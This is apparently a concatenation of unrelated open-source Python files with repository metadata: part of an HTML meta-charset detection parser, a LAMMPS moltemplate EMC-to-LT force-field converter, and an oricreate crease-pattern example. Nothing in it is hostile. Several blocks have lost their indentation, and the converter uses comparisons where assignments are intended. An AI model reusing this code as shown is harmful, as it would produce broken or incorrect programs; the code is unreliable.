            raise TypeError
        self._position = p = p - 1
        return self[p:p + 1]
    def setPosition(self, position):
        # Once the position has run off the end, any further use raises.
        if self._position >= len(self):
            raise StopIteration
        self._position = position
    def getPosition(self):
        if self._position >= len(self):
            raise StopIteration
        if self._position >= 0:
            return self._position
        else:
            return None
    position = property(getPosition, setPosition)
    def getCurrentByte(self):
        return self[self.position:self.position + 1]
    currentByte = property(getCurrentByte)
    def skip(self, chars=spaceCharactersBytes):
        """Skip past a list of characters"""
        # Returns the first byte NOT in *chars*, or None at end of data.
        p = self.position # use property for the error-checking
        while p < len(self):
            c = self[p:p + 1]
            if c not in chars:
                self._position = p
                return c
            p += 1
        self._position = p
        return None
    def skipUntil(self, chars):
        # Mirror of skip(): stop at the first byte that IS in *chars*.
        p = self.position
        while p < len(self):
            c = self[p:p + 1]
            if c in chars:
                self._position = p
                return c
            p += 1
        self._position = p
        return None
    def matchBytes(self, bytes):
        """Look for a sequence of bytes at the start of a string. If the bytes
        are found return True and advance the position to the byte after the
        match. Otherwise return False and leave the position alone"""
        p = self.position
        data = self[p:p + len(bytes)]
        rv = data.startswith(bytes)
        if rv:
            self.position += len(bytes)
        return rv
    def jumpTo(self, bytes):
        """Look for the next sequence of bytes matching a given sequence. If
        a match is found advance the position to the last byte of the match"""
        newPosition = self[self.position:].find(bytes)
        if newPosition > -1:
            # XXX: This is ugly, but I can't see a nicer way to fix this.
            if self._position == -1:
                self._position = 0
            self._position += (newPosition + len(bytes) - 1)
            return True
        else:
            raise StopIteration
class EncodingParser(object):
"""Mini parser for detecting character encoding from meta elements"""
def __init__(self, data):
"""string - the data to work on for encoding detection"""
self.data = EncodingBytes(data)
self.encoding = None
def getEncoding(self):
methodDispatch = (
(b"<!--", self.handleComment),
(b"<meta", self.handleMeta),
(b"</", self.handlePossibleEndTag),
(b"<!", self.handleOther),
(b"<?", self.handleOther),
(b"<", self.handlePossibleStartTag))
for byte in self.data:
keepParsing = True
for key, method in methodDispatch:
if self.data.matchBytes(key):
try:
keepParsing = method()
break
except StopIteration:
keepParsing = False
break
if not keepParsing:
break
return self.encoding
def handleComment(self):
"""Skip over comments"""
return self.data.jumpTo(b"-->")
def handleMeta(self):
if self.data.currentByte not in spaceCharactersBytes:
# if we have <meta not followed by a space so just keep going
return True
# We have a valid meta element we want to search for attributes
hasPragma = False
pendingEncoding = None
while True:
# Try to find the next attribute after the current position
attr = self.getAttribute()
if attr is None:
return True
else:
if attr[0] == b"http-equiv":
hasPragma = attr[1] == b"content-type"
if hasPragma and pendingEncoding is not None:
self.encoding = pendingEncoding
return False
elif attr[0] == b"charset":
tentativeEncoding = attr[1]
codec = codecName(tentativeEncoding)
if codec is not None:
self.encoding = codec
return False
elif attr[0] == b"content":
contentParser = ContentAttrParser(EncodingBytes(attr[1]))
tentativeEncoding = contentParser.parse()
if tentativeEncoding is not None:
codec = codecName(tentativeEncoding)
if codec is not None:
if hasPragma:
self.encoding = codec
return False
else:
pendingEncoding = codec
def handlePossibleStartTag(self):
return self.handlePossibleTag(False)
def handlePossibleEndTag(self):
next(self.data)
return self.handlePossibleTag(True)
def handlePossibleTag(self, endTag):
data = self.data
if data.currentByte not in asciiLettersBytes:
# If the next byte is not an ascii letter either ignore this
# fragment (possible start tag case) or treat it according to
# handleOther
if endTag:
data.previous()
self.handleOther()
return True
c = data.skipUntil(spacesAngleBrackets)
if c == b"<":
# return to the first step in the overall "two step" algorithm
# reprocessing the < byte
data.previous()
else:
# Read all attributes
attr = self.getAttribute()
while attr is not None:
attr = self.getAttribute()
return True
def handleOther(self):
return self.data.jumpTo(b">")
def getAttribute(self):
"""Return a name,value pair for the next attribute in the stream,
if one is found, or None"""
data = self.data
# Step 1 (skip chars)
c = data.skip(spaceCharactersBytes | frozenset([b"/"]))
assert c is None or len(c) == 1
# Step 2
if c in (b">", None):
return None
# Step 3
attrName = []
attrValue = []
# Step 4 attribute name
while True:
if c == b"=" and attrName:
break
elif c in spaceCharactersBytes:
# Step 6!
c = data.skip()
break
elif c in (b"/", b">"):
return b"".join(attrName), b""
elif c in asciiUppercaseBytes:
attrName.append(c.lower())
elif c is None:
return None
else:
attrName.append(c)
# Step 5
c = next(data)
# Step 7
if c != b"=":
data.previous()
return b"".join(attrName), b""
# Step 8
next(data)
# Step 9
c = data.skip()
# Step 10
if c in (b"'", b'"'):
# 10.1
quoteChar = c
while True:
# 10.2
c = next(data)
# 10.3
if c == quoteChar:
next(data)
return b"".join(attrName), b"".join(attrValue)
# 10.4
elif c in asciiUppercaseBytes:
attrValue.append(c.lower())
# 10.5
else:
attrValue.append(c)
elif c == b">":
return b"".join(attrName), b""
elif c in asciiUppercaseBytes:
attrValue.append(c.lower())
elif c is None:
return None
else:
attrValue.append(c)
# Step 11
while True:
c = next(data)
if c in spacesAngleBrackets:
return b"".join(attrName), b"".join(attrValue)
elif c in asciiUppercaseBytes:
attrValue.append(c.lower())
elif c is None:
return None
else:
attrValue.append(c)
class ContentAttrParser(object):
    """Extract a charset declaration from a meta "content" attribute value.

    *data* is expected to be an EncodingBytes instance (a bytes subclass),
    so the position/jumpTo/skip helpers used in parse() are available.
    """
    def __init__(self, data):
        assert isinstance(data, bytes)
        self.data = data
    def parse(self):
        # Any StopIteration raised by the EncodingBytes helpers means we
        # ran off the end of the data without finding a usable value.
        try:
            # Check if the attr name is charset
            # otherwise return
            self.data.jumpTo(b"charset")
            self.data.position += 1
            self.data.skip()
            if not self.data.currentByte == b"=":
                # If there is no = sign keep looking for attrs
                return None
            self.data.position += 1
            self.data.skip()
            # Look for an encoding between matching quote marks
            if self.data.currentByte in (b'"', b"'"):
                quoteMark = self.data.currentByte
                self.data.position += 1
                oldPosition = self.data.position
                if self.data.jumpTo(quoteMark):
                    return self.data[oldPosition:self.data.position]
                else:
                    return None
            else:
                # Unquoted value
                oldPosition = self.data.position
                try:
                    self.data.skipUntil(spaceCharactersBytes)
                    return self.data[oldPosition:self.data.position]
                except StopIteration:
                    # Return the whole remaining value
                    return self.data[oldPosition:]
        except StopIteration:
            return None
def codecName(encoding):
    """Map an encoding label to its Python codec name.

    Returns None for empty labels, byte labels that are not ASCII, and
    labels absent from the known ``encodings`` table.
    """
    if isinstance(encoding, bytes):
        try:
            encoding = encoding.decode("ascii")
        except UnicodeDecodeError:
            return None
    if not encoding:
        return None
    canonical = ascii_punctuation_re.sub("", encoding).lower()
    return encodings.get(canonical, None)
| mpl-2.0 |
ibethune/lammps | tools/moltemplate/moltemplate/force_fields/convert_EMC_files_to_LT_files/emcprm2lt.py | 3 | 24145 | #!/usr/bin/python
import os, sys, getopt
import datetime
__version__ = 0.2
#################### UNITS ####################
# Only used with --units flag
econv = 1.0 # Additional Factor for unit conversion if needed (energies)
lconv = 1.0 # Additional Factor for unit conversion if neededa (lengths)
dconv = 1.0 # Additional Factor for unit conversion if neededa (densities)
###############################################
print('\nEMC 2 LT conversion tool: v%s\n' % __version__)
def helpme():
    # Print command-line usage for the converter.  Python 2 print
    # statements, consistent with the rest of this script.
    print 'Help for the EMC 2 LT conversion tool\n'
    print 'Input takes a list of files in EMC .prm format to be read.'
    print 'Additional styles (bond, angle, etc) can be modified via the',\
    'command line. Any valid LAMMPS style can be used.\n'
    print 'Styles include:'
    print '--pair-style='
    print '--bond-style='
    print '--angle-style='
    print '--dihedral-style='
    print '--improper-style=\n'
    print 'Default styles are lj/cut/coul/long, harmonic, harmonic, harmonic,',\
    'harmonic \n'
    print 'Other commands:'
    print '--name= provides basename for output file if desired\n'
    print '--units flag for manual units (no parameter needed)\n'
    print 'Usage example:'
    print 'emcprm2lt.py file1 file2 --bond-style=harmonic --angle-style=harmonic'
    print ''
def Abort():
print 'Aborting...'
sys.exit()
def WriteInit():
    # Write generic LAMMPS settings, likely need additional on a per-ff basis
    # NOTE(review): relies on module globals set during parsing -- foutput
    # (open output file), bstyle/astyle/dstyle/istyle/pstyle (style names),
    # angle/torsion/improp flags, inner/cutoff/pair14 (.prm data) and lconv
    # (length conversion factor).  All must be initialised before calling.
    foutput.write(' write_once("In Init") {\n')
    foutput.write(' # Warning: This is a very generic "In Init" section, further\n')
    foutput.write(' # modification prior to any simulation is extremely likely\n')
    foutput.write(' units real\n')
    foutput.write(' atom_style full\n')
    foutput.write(' bond_style hybrid %s\n' % bstyle)
    if angle_flag:
        foutput.write(' angle_style hybrid %s\n' % astyle)
    if torsion_flag:
        foutput.write(' dihedral_style hybrid %s\n' % dstyle)
    if improp_flag:
        foutput.write(' improper_style hybrid %s\n' % istyle)
    foutput.write(' pair_style hybrid %s %f %f\n' % (pstyle,
        float(inner[0])*lconv, float(cutoff[0])*lconv))
    if pair14[0] == 'OFF':
        foutput.write(' special_bonds lj/coul 0.0 0.0 0.0\n')
    else:
        print 'Warning: special_bonds needed, add to "In Init" section\n'
    foutput.write(' } # end init\n')
def Units(length_flag, energy_flag, density_flag):
    # Check flags for all units, determine what conversions are needed, hard-coded for LAMMPS 'real'
    # Reads the module globals length/energy/density (unit names parsed from
    # the .prm file) and updates the global conversion factors in place;
    # they are also returned for convenience.
    print 'Attempting to auto-convert units... This should always be double-checked',\
    ' especially for unique potential styles'
    global lconv; global econv; global dconv
    if length_flag:
        print 'Warning: length scale does not match LAMMPS real units, attempting conversion to angstroms'
        if length[0] == 'NANOMETER':
            lconv = 10.0
            print ' nanometer -> angstrom'
        elif length[0] == 'MICROMETER':
            lconv = 10000.0
            print ' micrometer -> angstrom'
        elif length[0] == 'METER':
            lconv = 10000000000.0
            print ' meter -> angstrom'
        else:
            print 'Length units NOT converted'
    if energy_flag:
        print 'Warning: energy units do not match LAMMPS real units, attempting conversion to kcal/mol'
        if energy[0] == 'KJ/MOL':
            econv = 0.239006
            print ' kj/mol -> kcal/mol'
        elif energy[0] == 'J/MOL':
            econv = 0.000239006
            print ' j/mol -> kcal/mol'
        elif energy[0] == 'CAL/MOL':
            econv = 0.001
            print ' cal/mol -> kcal/mol'
        else:
            print 'Energy units NOT converted'
    if density_flag:
        print 'Warning: density units do not match LAMMPS real units, attempting conversion to gram/cm^3'
        if density[0] == 'KG/M^3':
            dconv = 0.001
            print ' kg/m^3 -> g/cm^3'
        else:
            print 'Density units NOT converted'
    return lconv, econv, dconv
def ChkPotential(manual_flag, angle_flag, torsion_flag, improp_flag):
# Check type of potential, determine type of unit conversion is necessary
global beconv
if angle_flag:
global aeconv
if torsion_flag:
global deconv
if improp_flag:
global ieconv
if manual_flag == False:
# Chk bond potential
if bstyle == '' or bstyle == 'harmonic':
beconv = econv / (2*pow(lconv,2))
else:
print 'Cannot find bond potential type, use manual units'
Abort()
if angle_flag:
if astyle == '' or astyle == 'harmonic':
aeconv = econv
elif astyle == 'cosine/squared':
aeconv = econv / 2
elif astyle == 'sdk':
aeconv = econv
else:
print 'Cannot find angle potential type, use manual units'
Abort()
# torsion and improper not implemented fully
elif torsion_flag:
if dstyle == '' or dstyle == 'harmonic':
deconv = econv
else:
print 'Cannot find torsion potential type, use manual units'
Abort()
elif improp_flag:
if istyle == '' or istyle == 'harmonic':
ieconv = econv
else:
print 'Cannot find improper potential type, use manual units'
Abort()
else:
# Modify as needed
print 'Warning: Manual units used, set potential conversion units in script'
beconv = 1
if angle_flag:
aeconv = 1
if torsion_flag:
deconv = 1
if improp_flag:
ieconv = 1
### Parse input ###
if len(sys.argv) == 1:
helpme()
sys.exit()
manual_units = False # Turned on via command line
args = list(sys.argv[1:])
myopts, args = getopt.gnu_getopt(args, 'fh', ['pair-style=', 'bond-style=', 'angle-style=',
'dihedral-style=', 'improper-style=', 'name=', 'units'])
filenames = list(args)
pstyle = ''; bstyle = ''; astyle = ''; dstyle = ''; istyle = ''
name = ''
for opt, arg in myopts:
if opt in ('-f'):
filenames = arg
elif opt in ('--pair-style'):
pstyle = arg
elif opt in ('--bond-style'):
bstyle = arg
elif opt in ('--angle-style'):
astyle = arg
elif opt in ('--dihedral-style'):
dstyle = arg
elif opt in ('--improper-style'):
istyle = arg
elif opt in ('--name'):
name = arg
elif opt in ('--units'):
manual_units = True
print 'Manual units enabled, modify python script accordingly'
elif opt in ('-h', '--help'):
helpme()
sys.exit()
### Check input filenames, make sure they exist ###
print 'Converting: '
for i in range(len(filenames)):
    if os.path.isfile(filenames[i]):
        print '', filenames[i]
    else:
        print 'invalid filename:', filenames[i]
        Abort()
print 'from EMC .prm to moltemplate .lt format\n'
### Open all files ###
f = [open(fname, 'r') for fname in filenames]
### All these settings from DEFINE should be list of fixed size ###
# One slot per input file; each slot is replaced by a string while parsing
# the DEFINE section below (an untouched slot stays an empty list).
ffname = [[] for i in range(len(f))]
fftype = [[] for i in range(len(f))]
version = [[] for i in range(len(f))]
created1 = [[] for i in range(len(f))]
created2 = [[] for i in range(len(f))]
length = [[] for i in range(len(f))]
energy = [[] for i in range(len(f))]
density = [[] for i in range(len(f))]
mix = [[] for i in range(len(f))]
nbonded = [[] for i in range(len(f))]
inner = [[] for i in range(len(f))]
cutoff = [[] for i in range(len(f))]
pair14 = [[] for i in range(len(f))]
angle_def = [[] for i in range(len(f))]
torsion_def = [[] for i in range(len(f))]
improp_def = [[] for i in range(len(f))] # not all prm have this
### Parse DEFINE section, save info for each file ###
# Scan each file for the ITEM DEFINE ... ITEM END span and record the
# per-file metadata (force-field name/type, units, cutoffs, section flags).
for i in range(len(f)):
    grab = False  # True only while inside the DEFINE span
    for line in f[i]:
        if line.strip() == 'ITEM DEFINE':
            grab = True
        elif line.strip() == 'ITEM END':
            grab = False
        elif grab:
            # Keyword lines: "<KEY> <value> [value2]"; second token is kept.
            if line.startswith('FFNAME'):
                ffname[i] = line.split()[1].strip()
            if line.startswith('FFTYPE'):
                fftype[i] = line.split()[1].strip()
            if line.startswith('VERSION'):
                version[i] = line.split()[1].strip()
            if line.startswith('CREATED'):
                created1[i] = line.split()[1].strip()
                created2[i] = line.split()[2].strip()
            if line.startswith('LENGTH'):
                length[i] = line.split()[1].strip()
            if line.startswith('ENERGY'):
                energy[i] = line.split()[1].strip()
            if line.startswith('DENSITY'):
                density[i] = line.split()[1].strip()
            if line.startswith('MIX'):
                mix[i] = line.split()[1].strip()
            if line.startswith('NBONDED'):
                nbonded[i] = line.split()[1].strip()
            if line.startswith('INNER'):
                inner[i] = line.split()[1].strip()
            if line.startswith('CUTOFF'):
                cutoff[i] = line.split()[1].strip()
            if line.startswith('PAIR14'):
                pair14[i] = line.split()[1].strip()
            # NOTE: startswith() also matches longer keywords sharing the
            # prefix (e.g. 'IMPROPER' matches 'IMPROP') -- relied upon here.
            if line.startswith('ANGLE'):
                angle_def[i] = line.split()[1].strip()
            if line.startswith('TORSION'):
                torsion_def[i] = line.split()[1].strip()
            if line.startswith('IMPROP'):
                improp_def[i] = line.split()[1].strip()
### Sanity Checks ###
# Cross-compare the DEFINE settings of every pair of input files; different
# force fields or unit systems cannot be merged into a single .lt file.
for i in range(len(f)):
    for j in range(len(f)):
        if ffname[j] != ffname[i]:
            print 'force field files do not match'
            Abort()
        if length[j] != length[i]:
            print 'units not identical between files'
            Abort()
        if energy[j] != energy[i]:
            print 'units not identical between files'
            Abort()
        if density[j] != density[i]:
            print 'units not identical between files'
            Abort()
        if inner[j] != inner[i]:
            print 'inner cutoff not identical between files'
            Abort()
        if cutoff[j] != cutoff[i]:
            print 'cutoff not identical between files'
            Abort()
        if pair14[j] != pair14[i]:
            print '1-4 pair interaction not consistent between files'
            Abort()
### Check if sections exist in PRM file ###
# 'WARN' in the DEFINE section marks the presence of the bonded section.
angle_flag = False; torsion_flag = False; improp_flag = False
for i in range(len(f)):
    if angle_def[i] == 'WARN':
        angle_flag = True
    if torsion_def[i] == 'WARN':
        torsion_flag = True
    if improp_def[i] == 'WARN':
        improp_flag = True
### Check which units to use, trip convert flags ###
# Any unit differing from LAMMPS 'real' (angstrom / kcal/mol / g/cc)
# triggers auto-conversion in Units(); manual mode disables all of it.
length_flag = False; energy_flag = False; density_flag = False
if length[0] != 'ANGSTROM':
    length_flag = True
if energy[0] != 'KCAL/MOL':
    energy_flag = True
if density[0] != 'G/CC':
    density_flag = True
if manual_units == True:
    length_flag = False
    energy_flag = False
    density_flag = False
Units(length_flag, energy_flag, density_flag)
### Read Whole File, save to lists ###
# Non-crucial sections include
# BONDS, ANGLE, TORSION, IMPROP, NONBOND
# Read all sections every time, only output sections when flags tripped
# Each "ITEM <NAME> ... ITEM END" span is tracked with its own boolean;
# inside a span, non-comment non-blank lines are tokenised and appended.
f = [open(fname, 'r') for fname in filenames]
masses = []; nonbond = []; bond = []; angle = []; torsion = []; improp = []
equiv = []
for i in range(len(f)):
    MASS = False
    NONBOND = False
    BOND = False
    ANGLE = False
    TORSION = False
    IMPROP = False
    EQUIV = False
    for line in f[i]:
        if line.strip() == 'ITEM MASS':
            MASS = True
        elif line.strip() == 'ITEM END':
            MASS = False
        elif MASS:
            if not line.startswith('#'):
                if not line.startswith('\n'):
                    masses.append(line.strip().split())
        if line.strip() == 'ITEM NONBOND':
            NONBOND = True
        elif line.strip() == 'ITEM END':
            NONBOND = False
        elif NONBOND:
            if not line.startswith('#'):
                if not line.startswith('\n'):
                    nonbond.append(line.strip().split())
        if line.strip() == 'ITEM BOND':
            BOND = True
        elif line.strip() == 'ITEM END':
            BOND = False
        elif BOND:
            if not line.startswith('#'):
                if not line.startswith('\n'):
                    bond.append(line.strip().split())
        if line.strip() == 'ITEM ANGLE':
            ANGLE = True
        elif line.strip() == 'ITEM END':
            ANGLE = False
        elif ANGLE:
            if not line.startswith('#'):
                if not line.startswith('\n'):
                    angle.append(line.strip().split())
        if line.strip() == 'ITEM TORSION':
            TORSION = True
        elif line.strip() == 'ITEM END':
            TORSION = False
        elif TORSION:
            if not line.startswith('#'):
                if not line.startswith('\n'):
                    torsion.append(line.strip().split())
        if line.strip() == 'ITEM IMPROP':
            IMPROP = True
        elif line.strip() == 'ITEM END':
            IMPROP = False
        elif IMPROP:
            if not line.startswith('#'):
                if not line.startswith('\n'):
                    improp.append(line.strip().split())
        if line.strip() == 'ITEM EQUIVALENCE':
            EQUIV = True
        elif line.strip() == 'ITEM END':
            EQUIV = False
        elif EQUIV:
            if not line.startswith('#'):
                if not line.startswith('\n'):
                    equiv.append(line.strip().split())
### Close prm files ###
for fname in f:
    fname.close()
### Sanity checks before writing LT files ###
# Check Equiv: the same atom type must not map to two different equivalences.
for i in range(len(equiv)):
    for j in range(len(equiv)):
        if (equiv[i][0] == equiv[j][0]) and (equiv[i] != equiv[j]):
            print 'Error: Identical atom types with different equivalences'
            Abort()
# Check Masses: the same atom type must have a single mass.
for i in range(len(masses)):
    for j in range(len(masses)):
        if (masses[i][0] == masses[j][0]) and (masses[i][1] != masses[j][1]):
            print 'Error: Identical types with different mass'
            Abort()
# Check Nonbond: a pair (type1, type2) must have unique epsilon/sigma.
for i in range(len(nonbond)):
    for j in range(len(nonbond)):
        if (nonbond[i][0] == nonbond[j][0]) and (nonbond[i][1] == nonbond[j][1]) and ((nonbond[i][2] != nonbond[j][2]) or (nonbond[i][3] != nonbond[j][3])):
            print nonbond[i], nonbond[j]
            print 'Error: Identical types with different pair-interactions'
            Abort()
### Remove double equivalences ###
# The first occurrence of a type wins; later duplicates are disabled by
# setting column 1 to None (every output loop checks for that sentinel).
for i in range(len(equiv)):
    once = True
    for j in range(len(equiv)):
        if (equiv[i][0] == equiv[j][0]) and once:
            once = False
        elif (equiv[i][0] == equiv[j][0]):
            equiv[j][1] = None
            equiv[j][2] = 'duplicate'
    # A valid equivalence row has exactly 6 columns: type + 5 categories.
    if len(equiv[i]) != 6:
        print 'Warning: Incorrect equivalence formatting for type %s' % equiv[i][0],\
            'skipping type, topology may not be complete'
        equiv[i][1] = None
        equiv[i][2] = 'invalid_format'
### Check Potential Styles and Set Units ###
ChkPotential(manual_units, angle_flag, torsion_flag, improp_flag)
### Set output LT file ###
fname = 'ff_output.lt'
if name == '':
    fname = ffname[0] + '.lt'
else:
    fname = name + '.lt'
foutput = open(fname, 'w')
### Output to LT format ###
foutput.write('# Autogenerated by EMC 2 LT tool v%s on %s\n' % (__version__, str(datetime.date.today())))
foutput.write('#\n# ')
for i in range(len(sys.argv)):
foutput.write('%s ' % sys.argv[i])
foutput.write('\n')
foutput.write('#\n')
foutput.write('# Adapted from EMC by Pieter J. in \'t Veld\n')
foutput.write('# Originally written as, FFNAME:%s STYLE:%s VERSION:%s on %s %s\n' %
(ffname[0], fftype[0], version[0], created1[0], created2[0]))
foutput.write('\n')
foutput.write('%s {\n' % ffname[0])
# Charges not necessary? emc file assign charges in smiles, which would
# be in the per-molecule files created by moltemplate user... not here
### Mass Info ###
foutput.write(' write_once("Data Masses") {\n')
for i in range(len(masses)):
if equiv[i][1] != None:
foutput.write(' @atom:%s %f # %s\n' %
(masses[i][0], float(masses[i][1]), masses[i][0]))
foutput.write(' } # end of atom masses\n\n')
### Equiv Info ###
# Write Equivalence
foutput.write(' # ----- EQUIVALENCE CATEGORIES for bonded interaction lookup -----\n')
for i in range(len(equiv)):
if equiv[i][1] != None:
foutput.write(' replace{ @atom:%s @atom:%s_b%s_a%s_d%s_i%s}\n' %
(equiv[i][0], equiv[i][0], equiv[i][2], equiv[i][3], equiv[i][4], equiv[i][5]))
foutput.write(' # END EQUIVALENCE\n\n')
# Sanity check equivalences vs masses
for i in range(len(equiv)):
check = None
for j in range(len(masses)):
if equiv[i][0] == masses[j][0]:
check = 'success'
if check == None:
print equiv[i], masses[j]
print 'Atom defined in Equivlances, but not found in Masses'
Abort()
# Sanity check masses vs equivalences
for i in range(len(masses)):
check = None
for j in range(len(masses)):
if masses[i][0] == equiv[j][0]:
check = 'success'
if check == None:
print masses[i], equiv[j]
print 'Atom defined in Masses, but not found in Equivlances'
Abort()
### Nonbonded Info ###
if pstyle == '':
    print 'Warning: no non-bonded potential provided, assuming lj/cut/coul/long'
    pstyle = 'lj/cut/coul/long'
foutput.write(' write_once("In Settings") {\n')
foutput.write(' # ----- Non-Bonded interactions -----\n')
# Add new types from equivalence: a type whose nonbond parameters are
# defined via another type (equiv[i][1]) gets copies of that type's rows,
# including a self-interaction row (added once per type).
for i in range(len(equiv)):
    once = True
    for j in range(len(nonbond)):
        # Get terms for new types
        if (equiv[i][0] != equiv[i][1]) and (equiv[i][1] == nonbond[j][0]):
            if not equiv[i][1] == nonbond[j][1]:
                line = '%s %s %s %s' % (equiv[i][0], nonbond[j][1], nonbond[j][2], nonbond[j][3])
                nonbond.append(line.split())
            if once:
                once = False
                line = '%s %s %s %s' % (equiv[i][0], equiv[i][0], nonbond[j][2], nonbond[j][3])
                nonbond.append(line.split())
        if (equiv[i][0] != equiv[i][1]) and (equiv[i][1] == nonbond[j][1]):
            # NOTE(review): comparing only against nonbond[-1] is a weak
            # duplicate guard -- confirm it is sufficient for real inputs.
            line = '%s %s %s %s' % (equiv[i][0], nonbond[j][0], nonbond[j][2], nonbond[j][3])
            if line.split() != nonbond[-1]:
                nonbond.append(line.split())
for i in range(len(nonbond)):
    atom1name = None
    atom2name = None
    stylename = pstyle
    # SDK pair styles encode the functional form per-pair (columns 4/5).
    if pstyle == 'lj/sdk' or pstyle == 'lj/sdk/coul/long':
        stylename = 'lj%s_%s' % (nonbond[i][4], nonbond[i][5])
    # Cross Terms + Diagonal, normal: decorate both atom names with their
    # equivalence categories so they match the replace{} rules above.
    for j in range(len(equiv)):
        if nonbond[i][0] == equiv[j][0]:
            atom1name = '%s_b%s_a%s_d%s_i%s' % (nonbond[i][0], equiv[j][2], equiv[j][3], equiv[j][4], equiv[j][5])
        if nonbond[i][1] == equiv[j][0]:
            atom2name = '%s_b%s_a%s_d%s_i%s' % (nonbond[i][1], equiv[j][2], equiv[j][3], equiv[j][4], equiv[j][5])
    if atom1name == None or atom2name == None:
        print atom1name, atom2name, nonbond[i]
        print 'Error: Atom in Nonbonded Pairs not found in Equivalences'
        Abort()
    # Columns: 2 = sigma (length), 3 = epsilon (energy); converted to real.
    foutput.write(' pair_coeff @atom:%s @atom:%s %s %f %f' %
                  (atom1name, atom2name, stylename, float(nonbond[i][3])*econv, float(nonbond[i][2])*lconv))
    foutput.write(' # %s-%s\n' % (nonbond[i][0], nonbond[i][1]))
foutput.write(' } # end of nonbonded parameters\n\n')
### Bond Info ###
if bstyle == '':
print 'Warning: no bond potential provided, assuming harmonic'
bstyle == 'harmonic'
foutput.write(' write_once("In Settings") {\n')
foutput.write(' # ----- Bonds -----\n')
for i in range(len(bond)):
foutput.write(' bond_coeff @bond:%s-%s %s %f %f' %
(bond[i][0], bond[i][1], bstyle, float(bond[i][2])*beconv, float(bond[i][3])*lconv))
foutput.write(' # %s-%s\n' % (bond[i][0], bond[i][1]))
foutput.write(' }\n\n')
foutput.write(' write_once("Data Bonds By Type") {\n')
for i in range(len(bond)):
foutput.write(' @bond:%s-%s @atom:*_b%s_a*_d*_i* @atom:*_b%s_a*_d*_i*\n' %
(bond[i][0], bond[i][1], bond[i][0], bond[i][1]))
foutput.write(' } # end of bonds\n\n')
### Angle Info ###
if angle_flag:
if astyle == '':
print 'Warning: no angle potential provided, assuming harmonic'
astyle == 'harmonic'
foutput.write(' write_once("In Settings") {\n')
foutput.write(' # ----- Angles -----\n')
for i in range(len(angle)):
if (len(angle[i]) > 5): # Check if extra data in angle array
foutput.write(' angle_coeff @angle:%s-%s-%s %s %f %f' %
(angle[i][0], angle[i][1], angle[i][2], str(angle[i][5]), float(angle[i][3])*aeconv, float(angle[i][4])))
foutput.write(' # %s-%s-%s\n' % (angle[i][0], angle[i][1], angle[i][2]))
else:
foutput.write(' angle_coeff @angle:%s-%s-%s %s %f %f' %
(angle[i][0], angle[i][1], angle[i][2], astyle, float(angle[i][3])*aeconv, float(angle[i][4])))
foutput.write(' # %s-%s-%s\n' % (angle[i][0], angle[i][1], angle[i][2]))
foutput.write(' }\n\n')
foutput.write(' write_once("Data Angles By Type") {\n')
for i in range(len(angle)):
foutput.write(' @angle:%s-%s-%s @atom:*_b*_a%s_d*_i* @atom:*_b*_a%s_d*_i* @atom:*_b*_a%s_d*_i*\n' %
(angle[i][0], angle[i][1], angle[i][2], angle[i][0], angle[i][1], angle[i][2]))
foutput.write(' } # end of angles\n\n')
### Torsion/Dihedral Info ###a
# Incomplete
if torsion_flag:
if dstyle == '':
print 'Warning: no dihedral/torsion potential provided, assuming harmonic'
dstyle == 'harmonic'
foutput.write(' write_once("In Settings") {\n')
foutput.write(' # ----- Dihedrals -----\n')
for i in range(len(torsion)):
foutput.write(' dihedral_coeff @dihedral:%s-%s-%s-%s %s %f %f %f %f\n' %
(torsion[i][0], torsion[i][1], torsion[i][2], torsion[i][3], dstyle, float(torsion[i][4])*deconv, float(torsion[i][5]), float(torsion[i][6])))
foutput.write(' }\n\n')
foutput.write(' write_once("Data Dihedrals By Type") {\n')
for i in range(len(torsion)):
foutput.write(' @dihedral:%s-%s-%s-%s @atom:*_b*_a*_d%s_i* @atom:*_b*_a*_d%s_i* @atom:*_b*_a*_d%s_i* @atom:*_b*_a*_d%s_i*' %
(torsion[i][0], torsion[i][1], torsion[i][2], torsion[i][3], torsion[i][0], torsion[i][1], torsion[i][2], torsion[i][3]))
foutput.write(' } # end of dihedrals\n\n')
### Improper Info ###
# Incomplete
ieconv = econv # improper coeff conversion
if improp_flag:
if istyle == '':
print 'Warning: no improper potential provided, assuming harmonic'
istyle == 'harmonic'
foutput.write(' write_once("In Settings") {\n')
foutput.write(' # ----- Impropers -----\n')
# As discussed, a check for convention of impropers is probably needed here
for i in range(len(improp)):
foutput.write(' improper_coeff @improper:%s-%s-%s-%s %s %f %f\n' %
(improp[i][0], improp[i][1], improp[i][2], improp[i][3], istyle,
float(improp[i][4]), float(improp[i][5])))
foutput.write(' }\n\n')
foutput.write(' write_once("Data Impropers By Type") {\n')
for i in range(len(improp)):
foutput.write(' @improper:%s-%s-%s-%s @atom:*_b*_a*_d*_i%s @atom:*_b*_a*_d*_i%s @atom:*_b*_a*_d*_i%s @atom:*_b*_a*_d*_i%s' %
(improp[i][0], improp[i][1], improp[i][2], improp[i][3], improp[i][0], improp[i][1], improp[i][2], improp[i][3]))
foutput.write(' } # end of impropers\n\n')
### Initialization Info ###
print 'Warning: Attempting to write generic "In Init" section,',\
'further modification after this script is extremely likely'
WriteInit()
foutput.write('} # %s\n' % ffname[0])
sys.exit()
| gpl-2.0 |
simvisage/oricreate | docs/howtos/ex04_cp_operators/cp_F_L_bases.py | 1 | 1043 | r'''
This example demonstrates the crease pattern factory usage
for Yoshimura crease pattern.
'''
def create_cp():
    """Build a two-facet Yoshimura-style crease pattern and print the
    orthonormal base vectors of its first edge.

    NOTE(review): the first ``return cp`` below makes the
    displaced-configuration demo unreachable -- confirm whether it was
    meant to be removed or guarded.
    """
    # begin
    from oricreate.api import CreasePatternState
    import numpy as np
    # Four nodes, five crease lines, two triangular facets.
    x = np.array([[0, 0, 0],
                  [1, 0, 0],
                  [1, 1, 0],
                  [2, 1, 0]
                  ], dtype='float_')
    L = np.array([[0, 1], [1, 2], [2, 0],
                  [1, 3], [2, 3]],
                 dtype='int_')
    F = np.array([[0, 1, 2],
                  [1, 3, 2],
                  ], dtype='int_')
    cp = CreasePatternState(X=x,
                            L=L,
                            F=F)
    print('Initial configuration')
    print('Orthonormal base vectors of a first edge\n', cp.F_L_bases[:, 0, :, :])
    return cp
    # NOTE(review): everything below is dead code (after the return above);
    # kept verbatim.
    cp.u[1, 2] = 1.0
    cp.u[2, 2] = 1.0
    cp.u = cp.u
    print('Displaced configuration')
    print('Orthonormal base vectors of a first edge r\n', cp.F_L_bases[:, 0, :, :])
    # end
    return cp
# Run the demo when executed as a script.
if __name__ == '__main__':
    create_cp()
| gpl-3.0 |
